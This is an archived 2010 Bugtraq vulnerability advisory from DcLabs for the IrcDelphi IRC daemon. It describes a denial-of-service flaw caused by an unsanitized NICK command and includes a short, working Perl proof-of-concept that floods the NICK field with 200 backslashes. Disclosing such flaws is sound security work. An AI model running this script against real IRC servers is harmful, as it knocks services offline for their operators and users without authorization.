|
|
 |
| New User, Welcome! Login |
IrcDelphi DCA-00010 Vulnerability Report
| From: |
=?ISO-8859-1?Q?Ewerson_Guimar=E3es_=28Crash=29_=2D_Dclabs?= <crash dclabs com br> |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
IrcDelphi DCA-00010 Vulnerability Report |
| Date: |
Fri - Jul 02, 2010 01:47 PM |
[DCA-0010]
[Software]
- IrcDelphi Daemon Server
[Vendor Product Description]
- IRC Daemon (IRCd, IRC Server) coded in Delphi/Kylix using Indy
components. Easy to use and light irc daemon.
[Bug Description]
- The IRC Daemon does not sanitize the variable NICK correctly leading
to a Denial-of-Service flaw.
[History]
- Advisory sent to vendor on 06/21/2010.
- No response
- Public adv. 07/02/2010
[Impact]
- Low
[Affected Version]
- IrcDelphi core-alpha1
- Prior versions may also be vulnerable.
[Codes]
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAIL
ED!\n";
print $socket "USER AA AA AA :AA\r\n";
print $socket "NICK ". "\\" x 200 ."\r\n";
sleep(3);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 6667\n";
exit;
}
----------------------------------------------------------------------------------------
DcLabs Security Group
Sponsor: ipax
ipax@dclabs.com.br
[Credits]
Crash and all DcLabs members.
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
